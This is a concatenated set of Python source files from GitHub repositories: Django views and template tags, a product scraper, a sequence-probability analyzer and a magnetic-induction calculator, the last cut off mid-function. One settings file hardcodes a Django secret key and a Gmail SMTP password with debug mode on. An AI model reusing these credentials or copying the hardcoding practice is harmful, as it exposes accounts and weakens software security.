Cells'\n    # )\n    image_options = {\n        'x_scale':0.7,\n        'y_scale':0.7,\n        \"object_position\":1,\n        #\"url\":'http://example.com', # make image clickable to open webpage\n        'decorative':False\n    }\n    end_column = len(data.columns) - 1\n    worksheet.insert_image('A2','TM Logo.png',image_options)\n    worksheet.write_datetime(2, end_column, datetime.today(), date_format)\n    worksheet.write_string(3, end_column, 'Test User', normal_bold)\n    worksheet.write_string(4, end_column, tollfree,normal_bold)\n    worksheet.write_string(5, end_column, startdate +' to '+ enddate, normal_bold)\n    worksheet.write_string(6, end_column, table_type ,normal_text)\n\n    # set column width\n    # worksheet.set_column('G:G',30) # width in character units\n\n    # write column names\n    for i, col in enumerate(data):\n        worksheet.set_column(i,i,15)\n        worksheet.write_string(7,i, col, blue_color) # row,column,data, format\n        for j, item in enumerate(data[col]):\n            if col == 'Duration':\n                worksheet.write_string(8+j,i,str(item))\n            else:\n                worksheet.write(8+j,i,item) # row,column,data,format\n    worksheet.set_column(end_column,end_column,len(startdate +' to '+ enddate))\n\n    # close to save\n    file.close()\n\n    output.seek(0)\n    \n    # django response\n    response = HttpResponse(\n        output.read(),\n        content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n    response['Content-Disposition'] = 'attachment; filename=test.xlsx'\n    
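# the BytesIO buffer now holds the finished workbook; hand it back as a download\n    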
return response\n\n\n\n\n\n\n","repo_name":"govind-raj99/2U2I","sub_path":"django/core/templates/Adhoc_Excel_Reports.py","file_name":"Adhoc_Excel_Reports.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"74627681756","text":"import os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nSECRET_KEY = 'ahjd9sddteijcfhp_&96w80k-s*0=uuq80th_p!u7qv9+y9tkw'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n# Static, Template, and Media directory locations!\nTEMPLATE_DIRS = ('flashcards/templates',)\nMEDIA_ROOT = 'media/'\nMEDIA_URL = '/media/'\nSTATIC_ROOT = ''\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ('flashcards/static',)\nTHEME_ROOT = 'flashcards/static/themes/'\nTHEME_URL = STATIC_URL + 'themes/'\n\n# Application definition\nINSTALLED_APPS = (\n    'django.contrib.admin',\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n    'flashcards',\n)\n\nMIDDLEWARE_CLASSES = (\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.common.CommonMiddleware',\n    'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'seteam3.urls'\n\nWSGI_APPLICATION = 'seteam3.wsgi.application'\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.sqlite3',\n        'NAME': 'flashcards.sqlite3',\n    }\n}\n\n\n# Internationalization\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'UTC'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n#Email setup for password change\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_PORT = 587\nEMAIL_HOST_USER = 'flashcardsprojectset3@gmail.com'\nEMAIL_HOST_PASSWORD = 'FlashCard'\n \nDEFAULT_FROM_EMAIL = EMAIL_HOST_USER\nSERVER_EMAIL = EMAIL_HOST_USER","repo_name":"latreides/SE_Team3","sub_path":"seteam3/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"35889601892","text":"import random\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404, redirect, render\nimport requests\nfrom articles.forms import Comment, CommentForm\nfrom django.contrib.auth.decorators import login_required\n\nfrom articles.models import Article\ndef getArticleData():\n    url = \"https://jsonblob.com/api/jsonBlob/1113201562272153600\"\n    response = requests.get(url)\n    if response.status_code == 200:\n        json_datas = response.json()\n        return json_datas[\"articles\"]\n    else:\n        return None \ndef index(request):\n    articleList = []\n    publishedArticles = Article.objects.filter(published=True)  # filter to only the published articles\n    for article in getArticleData():\n        articleId = random.randint(100,250)\n        articleTitle = article['title']\n        articleContent = article['content']\n        articleAuthor = article['author']\n        articleInfo = {\n            'articleTitle': articleTitle,\n            'articleContent': articleContent,\n            'articleAuthor': articleAuthor,\n            'articleId':articleId,\n        }\n        articleList.append(articleInfo)\n    \n    context = {\"articleList\": articleList,\n    \"publishedArticles\":publishedArticles}\n    return render(request, \"index.html\", context)\n\n
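# Illustrative shape of one articleList entry built above (values assumed):\n# {'articleTitle': '...', 'articleContent': '...', 'articleAuthor': '...', 'articleId': 187}\n\n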
@login_required\ndef deleteComment(request, commentId):\n    comment = get_object_or_404(Comment, id=commentId)\n    # perform the deletion\n    comment.delete()\n    # decide where to send the user after deleting\n    return redirect('article')  # for example, redirect back to the page that lists the comments\n\n@login_required\ndef editComment(request, commentId):\n    comment = get_object_or_404(Comment, id=commentId)\n    if request.method == \"POST\":\n        form = CommentForm(request.POST, instance=comment)\n        if form.is_valid():\n            form.save()\n            return redirect(\"index\")\n    else:\n        form = CommentForm(instance=comment)\n    context={\"form\":form}\n    return render(request,\"editComment.html\",context)","repo_name":"beratcankara/djangoBlog","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"28866377732","text":"import numpy as np\nimport pandas as pd\n\n'''\nName: calc_probs\nInput:\n    *X: sequence to be analyzed\n    *L: maximum sub-sequence length to be analyzed.\nOutput: \n    *probabilities: a list of dictionaries. Each dictionary contains keys\n    that are sequences of the same length. The value associated to a key\n    is a probability of that subsequence appearing in the original sequence\n    *alphabet: the unique symbols that appear in the sequence.\nDescription:\n    Checks the number of occurrences of subsequences of lengths from 1 to L.\n    Divides the number of occurrences by the sequence's length in order to\n    obtain relative frequencies. Creates a dictionary for subsequences of \n    each length. When checking for subsequences of length 1, the method \n    records each individual symbol that appears and stores it as the\n    sequence's alphabet.\n''' \ndef calc_probs(X, L):\n    #Output lists, initialized as empty lists:\n    probabilities = []\n    alphabet = []\n    print(\"Calculating subsequence probabilities\")\n    print(\"L = \" + str(L))\n    #This first loop iterates the subsequence length to be analyzed:\n    for l in range(1, L + 1):\n        print(\"Calculating probabilities of subsequences of length: \" + str(l))\n        current_probs = {} #Dictionary storing the probabilities of current l\n        #This loop traverses the string counting occurrences of subsequences:\n        for i in range(0, len(X) - (l - 1)):\n            #current_value stores a string with the subsequence from position\n            #i to position i+l\n            current_value = ''.join(str(e) for e in X[i:i+l])\n            #When l is 1, the unique symbols are stored in alphabet:\n            if l == 1:\n                if not (current_value in alphabet):\n                    alphabet.append(current_value)\n            #If the key for current_value has not appeared yet, it is created\n            #and its count starts at 1.\n            if not current_value in current_probs.keys():\n                current_probs[current_value] = 1\n            #If the key has already shown up, its count is incremented.\n            else:\n                current_probs[current_value] += 1\n        #After the sequence is analyzed, the counts for each key are divided by\n        #the sequence's length in order to get probabilities:\n        for key in current_probs.keys():\n            current_probs[key] /= float(len(X))\n        probabilities.append(current_probs)\n    print(\"*****************\")\n    print(\"Probabilities calculated!\")\n    print(\"*****************\")\n    return [probabilities, alphabet]\n\n
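# A quick hand-worked illustration (not from the original file):\n# probs, alphabet = calc_probs('abab', 2)\n# probs[0] == {'a': 0.5, 'b': 0.5}; probs[1] == {'ab': 0.5, 'ba': 0.25}; alphabet == ['a', 'b']\n\n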
'''\nName: calc_cond_probs\nInput:\n    *probabilities: the sub-sequence probabilities of the original sequence;\n    *alphabet: the set of unique symbols appearing in the original sequence; \n    *L: maximum sub-sequence length to be analyzed.\nOutput: \n    *conditional_probabilities: a list of dictionaries. Each dictionary \n    contains keys that are of the form:\n        symbol|subsequence\n    meaning the probability of \"symbol\" occurring after that subsequence.\n    There is one dictionary for each length of subsequence.\nDescription:\n    Calculates the probability of each symbol in alphabet occurring after each\n    subsequence in probabilities and creates a similar dictionary for those\n    conditional probabilities.\n''' \ndef calc_cond_probs(probabilities, alphabet, L):\n    #Output initialized as empty list:\n    conditional_probabilities = []\n    print(\"Calculating subsequence conditional probabilities\")\n    print(\"L = \" + str(L))\n    if probabilities:\n        #The first element, i.e. the probabilities of each symbol given the\n        #empty string, is just the probabilities of the occurrence of those\n        #symbols, i.e. the first element of the probabilities list.\n        conditional_probabilities = [probabilities[0]]\n        #This loop calculates the conditional probabilities of each alphabet\n        #symbol given subsequences of length greater than 0:\n        for l in range(0, L):\n            print(\"Calculating conditional probabilities of subsequences of length: \" + str(l))\n            #Initialization of the empty dictionary for the current l:\n            d = {}\n            #l1 holds the probabilities of the layer l\n            l1 = probabilities[l]\n            #while l2 holds the probs of the layer l + 1\n            l2 = probabilities[l+1]\n            #loops for each subsequence s in the layer l:\n            for s in l1:\n                #loops for each symbol a in the alphabet:\n                for a in alphabet:\n                    #The string cond, a|s, means symbol a given subsequence s\n                    cond = a + \"|\" + s\n                    #t holds the subsequence s concatenated with a, which should\n                    #be present in l2\n                    t = s + a\n                    #if t is a key in l2, i.e. it was present in the original \n                    #sequence:\n                    if t in l2.keys():\n                        #The probability of a given s is computed as the prob\n                        #of t divided by the prob of s:\n                        d[cond] = l2[t]/l1[s]\n                    else:\n                        #If not, the probability is simply zero:\n                        d[cond] = 0.0\n            #The conditional probability dictionary of the current layer is \n            #added to the output list:\n            conditional_probabilities.append(d)\n    else:\n        print(\"Probabilities not computed.\")\n        print(\"Run calc_probs function before this one.\")\n    print(\"*****************\")\n    print(\"Conditional probabilities calculated!\")\n    print(\"*****************\")\n    return conditional_probabilities\n","repo_name":"franchenstein/dcgram","sub_path":"sequenceanalyzer.py","file_name":"sequenceanalyzer.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"8277015593","text":"from django import template\n\nfrom ..sitetreeapp import get_sitetree\n\nregister = template.Library()\n\n# All utility methods are implemented in SiteTree class\nsitetree = get_sitetree()\n\n\n@register.tag\ndef sitetree_tree(parser, token):\n    \"\"\"Parses sitetree tag parameters.\n\n    Two notation types are possible:\n    1. Two arguments:\n       {% sitetree_tree from \"mytree\" %}\n       Used to render tree for \"mytree\" site tree.\n\n    2. Four arguments:\n       {% sitetree_tree from \"mytree\" template \"sitetree/mytree.html\" %}\n       Used to render tree for \"mytree\" site tree using specific\n       template \"sitetree/mytree.html\"\n\n    \"\"\"\n    tokens = token.split_contents()\n    use_template = detect_clause(parser, 'template', tokens)\n    tokens_num = len(tokens)\n\n    if tokens_num in (3, 5):\n        tree_alias = parser.compile_filter(tokens[2])\n        return sitetree_treeNode(tree_alias, use_template)\n    else:\n        raise template.TemplateSyntaxError(\"%r tag requires two arguments. 
E.g. {%% sitetree_tree from \"mytree\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_children(parser, token):\n    \"\"\"Parses sitetree_children tag parameters.\n\n    Six arguments:\n        {% sitetree_children of someitem for menu template \"sitetree/mychildren.html\" %}\n        Used to render child items of specific site tree 'someitem'\n        using template \"sitetree/mychildren.html\" for menu navigation.\n\n    Basically, the template argument should contain the path to the current template itself.\n\n    Allowed navigation types: 1) menu; 2) sitetree.\n\n    \"\"\"\n    tokens = token.split_contents()\n    use_template = detect_clause(parser, 'template', tokens)\n    tokens_num = len(tokens)\n\n    if tokens_num == 5 and tokens[1] == 'of' and tokens[3] == 'for' and tokens[4] in ('menu', 'sitetree') and use_template is not None:\n        tree_item = tokens[2]\n        navigation_type = tokens[4]\n        return sitetree_childrenNode(tree_item, navigation_type, use_template)\n    else:\n        raise template.TemplateSyntaxError(\"%r tag requires six arguments. E.g. {%% sitetree_children of someitem for menu template \\\"sitetree/mychildren.html\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_breadcrumbs(parser, token):\n    \"\"\"Parses sitetree_breadcrumbs tag parameters.\n\n    Two notation types are possible:\n    1. Two arguments:\n       {% sitetree_breadcrumbs from \"mytree\" %}\n       Used to render breadcrumb path for \"mytree\" site tree.\n\n    2. Four arguments:\n       {% sitetree_breadcrumbs from \"mytree\" template \"sitetree/mycrumb.html\" %}\n       Used to render breadcrumb path for \"mytree\" site tree using specific\n       template \"sitetree/mycrumb.html\"\n\n    \"\"\"\n    tokens = token.split_contents()\n    use_template = detect_clause(parser, 'template', tokens)\n    tokens_num = len(tokens)\n\n    if tokens_num == 3:\n        tree_alias = parser.compile_filter(tokens[2])\n        return sitetree_breadcrumbsNode(tree_alias, use_template)\n    else:\n        raise template.TemplateSyntaxError(\"%r tag requires two arguments. E.g. {%% sitetree_breadcrumbs from \\\"mytree\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_menu(parser, token):\n    \"\"\"Parses sitetree_menu tag parameters.\n\n    {% sitetree_menu from \"mytree\" include \"trunk,1,level3\" %}\n    Used to render trunk, branch with id 1 and branch aliased 'level3'\n    elements from \"mytree\" site tree as a menu.\n\n    These are reserved aliases:\n        * 'trunk' - items without parents\n        * 'this-children' - items under item resolved as current for the current page\n        * 'this-siblings' - items under parent of item resolved as current for\n          the current page (current item included)\n        * 'this-ancestor-children' - items under grandparent item (closest to root)\n          for the item resolved as current for the current page\n\n    {% sitetree_menu from \"mytree\" include \"trunk,1,level3\" template \"sitetree/mymenu.html\" %}\n\n    \"\"\"\n    tokens = token.split_contents()\n    use_template = detect_clause(parser, 'template', tokens)\n    tokens_num = len(tokens)\n\n    if tokens_num == 5 and tokens[3] == 'include':\n        tree_alias = parser.compile_filter(tokens[2])\n        tree_branches = parser.compile_filter(tokens[4])\n        return sitetree_menuNode(tree_alias, tree_branches, use_template)\n    else:\n        raise template.TemplateSyntaxError(\"%r tag requires four arguments. E.g. 
{%% sitetree_menu from \"mytree\" include \"trunk,1,level3\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_url(parser, token):\n    \"\"\"This tag is much the same as the Django built-in 'url' tag.\n    The difference is that after 'for' it should get a TreeItem object.\n\n    \"\"\"\n    tokens = token.contents.split()\n    tokens_num = len(tokens)\n    as_var = False\n\n    if tokens_num >= 3 and tokens[1] == 'for':\n        if tokens[-2] == 'as':\n            as_var = tokens[-1]\n            tokens = tokens[:-2]\n        sitetree_item = parser.compile_filter(tokens[2])\n        return sitetree_urlNode(sitetree_item, as_var)\n    else:\n        raise template.TemplateSyntaxError(\"%r tag should look like {%% sitetree_url for someitem params %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_page_title(parser, token):\n    \"\"\"Renders a title for the current page, resolved against the sitetree item representing the current URL.\"\"\"\n    tokens = token.split_contents()\n\n    if len(tokens) == 3:\n        tree_alias = parser.compile_filter(tokens[2])\n        return sitetree_page_titleNode(tree_alias)\n    else:\n        raise template.TemplateSyntaxError(\"%r tag requires two arguments. E.g. {%% sitetree_page_title from \\\"mytree\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_page_description(parser, token):\n    \"\"\"Renders a description for the current page, resolved against the sitetree item representing the current URL.\"\"\"\n    tokens = token.split_contents()\n\n    if len(tokens) == 3:\n        tree_alias = parser.compile_filter(tokens[2])\n        return sitetree_page_descriptionNode(tree_alias)\n    else:\n        raise template.TemplateSyntaxError(\"%r tag requires two arguments. E.g. {%% sitetree_page_description from \\\"mytree\\\" %%}.\" % tokens[0])\n\n\n@register.tag\ndef sitetree_page_hint(parser, token):\n    \"\"\"Renders a hint for the current page, resolved against the sitetree item representing the current URL.\"\"\"\n    tokens = token.split_contents()\n\n    if len(tokens) == 3:\n        tree_alias = parser.compile_filter(tokens[2])\n        return sitetree_page_hintNode(tree_alias)\n    else:\n        raise template.TemplateSyntaxError(\"%r tag requires two arguments. E.g. 
{%% sitetree_page_hint from \\\"mytree\\\" %%}.\" % tokens[0])\n\n\nclass sitetree_treeNode(template.Node):\n \"\"\"Renders tree items from specified site tree.\"\"\"\n\n def __init__(self, tree_alias, use_template):\n self.use_template = use_template\n self.tree_alias = tree_alias\n\n def render(self, context):\n tree_items = sitetree.tree(self.tree_alias, context)\n return render(context, tree_items, self.use_template or 'sitetree/tree.html')\n\n\nclass sitetree_childrenNode(template.Node):\n \"\"\"Renders tree items under specified parent site tree item.\"\"\"\n\n def __init__(self, tree_item, navigation_type, use_template):\n self.use_template = use_template\n self.tree_item = tree_item\n self.navigation_type = navigation_type\n\n def render(self, context):\n return sitetree.children(self.tree_item, self.navigation_type, self.use_template.resolve(context), context)\n\n\nclass sitetree_breadcrumbsNode(template.Node):\n \"\"\"Renders breadcrumb trail items from specified site tree.\"\"\"\n\n def __init__(self, tree_alias, use_template):\n self.use_template = use_template\n self.tree_alias = tree_alias\n\n def render(self, context):\n tree_items = sitetree.breadcrumbs(self.tree_alias, context)\n return render(context, tree_items, self.use_template or 'sitetree/breadcrumbs.html')\n\n\nclass sitetree_menuNode(template.Node):\n \"\"\"Renders specified site tree menu items.\"\"\"\n\n def __init__(self, tree_alias, tree_branches, use_template):\n self.use_template = use_template\n self.tree_alias = tree_alias\n self.tree_branches = tree_branches\n\n def render(self, context):\n tree_items = sitetree.menu(self.tree_alias, self.tree_branches, context)\n return render(context, tree_items, self.use_template or 'sitetree/menu.html')\n\n\nclass sitetree_urlNode(template.Node):\n \"\"\"Resolves and renders specified url.\"\"\"\n\n def __init__(self, sitetree_item, as_var):\n self.sitetree_item = sitetree_item\n self.as_var = as_var\n\n def render(self, context):\n resolved_url = sitetree.url(self.sitetree_item, context)\n if self.as_var:\n context[self.as_var] = resolved_url\n return ''\n return resolved_url\n\n\nclass sitetree_page_titleNode(template.Node):\n \"\"\"Renders a page title from the specified site tree.\"\"\"\n\n def __init__(self, tree_alias):\n self.tree_alias = tree_alias\n\n def render(self, context):\n return sitetree.get_current_page_title(self.tree_alias, context)\n\n\nclass sitetree_page_descriptionNode(template.Node):\n \"\"\"Renders a page description from the specified site tree.\"\"\"\n\n def __init__(self, tree_alias):\n self.tree_alias = tree_alias\n\n def render(self, context):\n return sitetree.get_current_page_attr('description', self.tree_alias, context)\n\n\nclass sitetree_page_hintNode(template.Node):\n \"\"\"Renders a page hint from the specified site tree.\"\"\"\n\n def __init__(self, tree_alias):\n self.tree_alias = tree_alias\n\n def render(self, context):\n return sitetree.get_current_page_attr('hint', self.tree_alias, context)\n \n\ndef detect_clause(parser, clause_name, tokens):\n \"\"\"Helper function detects a certain clause in tag tokens list.\n Returns its value.\n\n \"\"\"\n if clause_name in tokens:\n t_index = tokens.index(clause_name)\n clause_value = parser.compile_filter(tokens[t_index + 1])\n del tokens[t_index:t_index + 2]\n else:\n clause_value = None\n return clause_value\n\n\ndef render(context, tree_items, use_template):\n \"\"\"Render helper is used by template node functions\n to render given template with given tree items in context.\n\n 
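A minimal illustrative call (template name assumed): render(context, items, 'sitetree/menu.html').\n\n    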
\"\"\"\n context.push()\n context['sitetree_items'] = tree_items\n\n if isinstance(use_template, template.FilterExpression):\n use_template = use_template.resolve(context)\n\n content = template.loader.get_template(use_template).render(context)\n context.pop()\n\n return content\n","repo_name":"behappyyoung/PythonSampleCodes","sub_path":"Django/forheroku/vir_env/lib/python2.7/site-packages/sitetree/templatetags/sitetree.py","file_name":"sitetree.py","file_ext":"py","file_size_in_byte":10613,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"50"} +{"seq_id":"38276274881","text":"import os\r\nfrom os.path import basename\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom PIL import Image\r\nimport requests\r\nimport re\r\n\r\nfrom products.models import Category, Product\r\n\r\n\r\ndef category_crawler():\r\n base_url = \"https://berozkala.com\"\r\n response = requests.get(base_url)\r\n soup = BeautifulSoup(response.text, features='html.parser')\r\n result_set = soup.select(\"#navigation > ul > li > a\")\r\n for page_element in result_set:\r\n s = BeautifulSoup(str(page_element), features='html.parser')\r\n for a in s.find_all('a', href=True):\r\n Category.objects.create(name=a.text.strip(), url=(base_url + a['href']))\r\n\r\n\r\ndef product_crawler(category):\r\n response = requests.get(category.url)\r\n soup = BeautifulSoup(response.text, features='html.parser')\r\n names = soup.select(\r\n '#mweb-site-wrap > div > div > div > div.content-wrap.content-with-sidebar.col-md-27.col-xs-36 > nav > ul > '\r\n 'li > div > div > div.product-detail-area > h3 > a')\r\n prices = soup.select(\r\n '#mweb-site-wrap > div > div > div > div.content-wrap.content-with-sidebar.col-md-27.col-xs-36 > nav > ul > '\r\n 'li > div > div > div.product-detail-area > span > ins > span')\r\n\r\n images = soup.select(\r\n '#mweb-site-wrap > div > div > div > div.content-wrap.content-with-sidebar.col-md-27.col-xs-36 > nav > ul > '\r\n 'li > div > div > div.product-image-area > a > img')\r\n\r\n urls = soup.select(\r\n '#mweb-site-wrap > div > div > div > div.content-wrap.content-with-sidebar.col-md-27.col-xs-36 > nav > ul > '\r\n 'li > div > div > div.product-image-area > a'\r\n )\r\n\r\n image_path = 'media/products'\r\n try:\r\n os.mkdir(image_path)\r\n except FileExistsError:\r\n pass\r\n for name, price, url, image in list(zip(names, prices, urls, images)):\r\n image_url = 'https://berozkala.com' + image['src']\r\n image_file = Image.open(requests.get(image_url, stream=True).raw)\r\n image_file.save('{}/{}'.format(image_path, basename(image['src'])))\r\n\r\n product_url = 'https://berozkala.com' + url['href']\r\n\r\n Product.objects.create(name=name.text, price=int(re.sub(\"\\\\D\", \"\", price.text)), category=category,\r\n image='{}/{}'.format(image_path.split('/')[1], basename(image['src'])), url=product_url)\r\n","repo_name":"aminmohammadlou/berozkala_crawler","sub_path":"berozkala_crawler/products/utils/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"16395354925","text":"from cmath import rect\nfrom math import radians\n\nimport numpy as np\nfrom numpy.core.fromnumeric import shape\n\nfrom .config import MU_ZERO, PI\n\n\ndef _which_iterator(subparser_type):\n '''\n Based on the subparser type, it returns the corresponding iterator useful in \"for\" loops in the calculation and graphical part.\n\n Parameters\n -------------------\n 
subparser_type : str\n        Parsed argument, indicating the subparser called in the command line.\n\n    Returns\n    -------------------\n    iter_triad : int\n        Iterator useful in \"for\" loops.\n    '''\n    if subparser_type == 'single':\n        iter_triad = 1\n    elif subparser_type == 'double':\n        iter_triad = 2\n    return iter_triad\n\n\ndef calc_B_phasors(current, xp, yp, cable_array):\n\n    \"\"\"It calculates the phasors of the x and y components of the\n    magnetic induction field B in a given point for a given cable.\n\n    Given the input, the function rectifies the current phase\n    extracting respectively the real and imaginary part of it.\n    Then, both real and imaginary part of x and y components are\n    multiplied by a transfer function (dependent on the spatial\n    disposition of the cable in respect to the point of interest)\n    resulting in the magnetic induction B phasor components of a\n    single cable.\n\n    Parameters\n    -------------------\n    current : int\n        Current (A) circulating inside the considered power line\n        (composed of a triad of cables)\n    xp, yp : float\n        Abscissa (m) and ordinate (m) of the point of interest where\n        the magnetic induction field B will be calculated at last\n    cable_array : numpy.ndarray\n        First column - Current phase belonging to the n-th cable under consideration\n        Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n\n    Returns\n    -------------------\n    B_phasors_n : numpy.ndarray\n        Respectively the real and imaginary part (columns) of the\n        x and y components (rows) of the magnetic induction field B\n        produced by a single cable in a given point\n\n    Notes\n    -------------------\n    The current function implements the calculations present both in\n    [1]_\"Norma Italiana CEI 106-11\" formulas (5) and [2]_\"Norma Italiana\n    CEI 211-4\" formulas (16).\n\n    References\n    -------------------\n    ..[1] Norma Italiana CEI 106-11, \"Guide for the determination of\n    the respect widths for power lines and substations according to\n    DPCM 8 July 2003 (Clause 6) - Part 1: Overhead lines and cables\",\n    first edition, 2006-02.\n    ..[2] Norma Italiana CEI 211-4, \"Guide to calculation methods of\n    electric and magnetic fields generated by power-lines and electrical\n    substations\", second edition, 2008-09.\n    \"\"\"\n\n    ph_n_rad = radians(cable_array[0])\n    I_complex = rect(current, ph_n_rad)\n    I_components = np.array([I_complex.real, I_complex.imag])\n    coef = (MU_ZERO / (2*PI)) / ((xp - cable_array[1])**2 + (yp - cable_array[2])**2)\n    transfer_fn_n = np.array([(cable_array[2] - yp) * coef, (xp - cable_array[1]) * coef]).reshape(2, 1)\n    B_phasors_n = I_components * transfer_fn_n\n    return B_phasors_n\n\n\n
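# Illustrative call (values assumed, not from the original file): a 100 A cable at\n# (5, 5) with phase 0, observed from the origin, gives\n# calc_B_phasors(100.0, 0.0, 0.0, np.array([0.0, 5.0, 5.0])) -> a 2x2 array whose\n# rows are the x/y components and whose columns are the real/imaginary parts.\n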
def calc_B_effective(*B_phasors):\n\n    \"\"\"It calculates the effective value of the magnetic induction field B\n    (microTesla) in a given point, considering the magnetic induction of\n    all the cables provided.\n\n    Firstly, the function computes the resulting real and imaginary parts\n    of the x and y magnetic induction field components considering all the\n    contributing cables given as input (typically three or six cables).\n    The 'B_components' 2x2 numpy matrix indicates this intermediate step.\n\n    Secondly, the module of the effective magnetic induction field B is\n    calculated as the square root of the sum of the squares of the\n    components mentioned above.\n\n    Lastly, the result is transformed from Tesla units to micro Tesla units.\n\n    Parameters\n    -------------------\n    *B_phasors : numpy.ndarray\n        Respectively the real and imaginary part (columns) of the\n        x and y components (rows) of the magnetic induction field B\n        produced by a single cable in a given point\n\n    Returns\n    -------------------\n    B_effective_microT : float\n        Effective magnetic induction field B (microTesla) calculated in the given point\n\n    Notes\n    -------------------\n    The current function implements the calculations present both in\n    [1]_\"Norma Italiana CEI 106-11\" formulas (3-4) and [2]_\"Norma Italiana\n    CEI 211-4\" formulas (17).\n\n    References\n    -------------------\n    ..[1] Norma Italiana CEI 106-11, \"Guide for the determination of\n    the respect widths for power lines and substations according to\n    DPCM 8 July 2003 (Clause 6) - Part 1: Overhead lines and cables\",\n    first edition, 2006-02.\n    ..[2] Norma Italiana CEI 211-4, \"Guide to calculation methods of\n    electric and magnetic fields generated by power-lines and electrical\n    substations\", second edition, 2008-09.\n    \"\"\"\n    B_components = 0\n    for B_phasor in B_phasors:\n        B_components += B_phasor\n    B_effective_T = np.sqrt(np.sum(B_components**2))\n    B_effective_microT = B_effective_T*10**(6)\n    return B_effective_microT\n\n\ndef main_point(current_s, xp, yp, diam_cables, cables_array, subparser_type):\n    \"\"\"Given one or two triads of cables (i.e. power lines), the function\n    computes the composed effective magnetic induction B in a given point.\n\n    The respective phasors of the magnetic induction B of each cable\n    are iteratively computed and then composed to obtain the result.\n\n    N.B. - In case the point of interest is too close to one of the cables,\n    i.e. inside the 2D space effectively occupied by the cables,\n    a dummy B value of 9999 microTesla is returned.\n    This avoids a vanishing denominator.\n\n    Parameters\n    -------------------\n    current_s : numpy.ndarray\n        Current (A) circulating inside the considered power line/lines\n        (each one composed of a triad of cables)\n    xp, yp : float\n        Abscissa (m) and ordinate (m) of the point of interest where\n        the magnetic induction field B will be calculated at last\n    diam_cables : float\n        Diameter (m) of the cables in use\n    cable_array : numpy array\n        First column - Current phase belonging to the n-th cable under consideration\n        Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n\n    Returns\n    -------------------\n    B_eff : float\n        Effective magnetic induction field B (microTesla) calculated in the given point\n    \"\"\"\n    point_P = np.array((xp, yp))\n    radius_cable = diam_cables/2\n    B_phasors_cables = np.zeros((2, 3, 2, 2))\n    #2 super-sets (two triads), 3 sets (three cables each), 2 row each, 2 columns each\n\n    iter_triad = _which_iterator(subparser_type)\n    for j in range(iter_triad):\n        for i in range(3):\n            # compare the squared distance with the squared radius\n            if np.sum(np.square(point_P - np.array((cables_array[j, i, 1], cables_array[j, i, 2])))) < radius_cable**2:\n                B_dummy = 9999\n                return B_dummy\n            B_phasors_cables[j, i,] = calc_B_phasors(current_s[j], xp, yp, cables_array[j, i,])\n    B_eff = calc_B_effective(B_phasors_cables[0, 0, ], B_phasors_cables[0, 1, ], B_phasors_cables[0, 2, ],\n                             B_phasors_cables[1, 0, ], B_phasors_cables[1, 1, ], B_phasors_cables[1, 2, ],)\n    return B_eff\n\n\ndef main_grid(current_s, xp, yp, diam_cables, cables_array, subparser_type):\n    '''\n    It calculates the B values of a 2D grid centered on the point of interest,\n    with 6m side and 50cm step.\n\n    If dummy B values are found, they are replaced with\n    the maximum B value calculated (other than 9999 microTesla).\n\n    Parameters\n    -------------------\n    current_s : numpy.ndarray\n        Current (A) circulating inside the 
considered power line/lines\n (each one composed of a triad of cables)\n xp, yp : float\n Abscissa (m) and ordinate (m) of the point of interest where\n the magnetic induction field B will be calculated at last\n diam_cables : float\n Diameter (m) of the cables in use\n cable_array : numpy array\n First column - Current phase belonging to the n-th cable under consideration\n Second and third columns - Abscissa and ordinate of the n-th cable under consideration\n subparser_type : str\n Parsed argument, indicating the subparser called in the command line.\n\n Returns\n -------------------\n x, y, z_grid : numpy.ndarray\n (1D) Abscissas (m) and ordinates (m) having the point of interest in their center.\n (2D) B values corresponding to the (x,y) couples.\n '''\n nx, ny = 13, 13\n x = np.linspace(xp-3, xp+3, nx)\n y = np.linspace(yp-3, yp+3, ny)\n z_grid = np.zeros((ny, nx))\n X, Y = np.meshgrid(x, y, sparse=True, indexing='xy')\n #cartesian indexing: treat X[j, i] Y[j, i]\n\n for i in range(nx):\n for j in range(ny):\n z_grid[j, i] = main_point(current_s, X[0, i], Y[j, 0], diam_cables, cables_array, subparser_type)\n\n 